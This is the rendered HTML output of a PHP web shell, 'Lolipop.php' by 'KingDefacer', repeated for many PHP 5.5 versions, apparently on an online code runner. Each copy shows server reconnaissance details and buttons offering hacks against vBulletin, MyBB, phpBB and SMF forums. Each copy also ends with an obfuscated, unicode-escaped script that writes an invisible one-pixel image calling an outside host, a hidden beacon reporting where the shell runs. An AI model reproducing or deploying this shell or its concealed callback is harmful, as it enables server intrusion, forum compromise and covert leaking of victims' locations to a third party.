<u>5.5.22</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.21
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.21</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.20
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.20</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.19
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.19</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.18
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.18</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.17
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.17</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.16
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.16</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.15
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.15</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.14
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.14</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.13
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.13</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.12
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.12</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.11
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.11</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.10
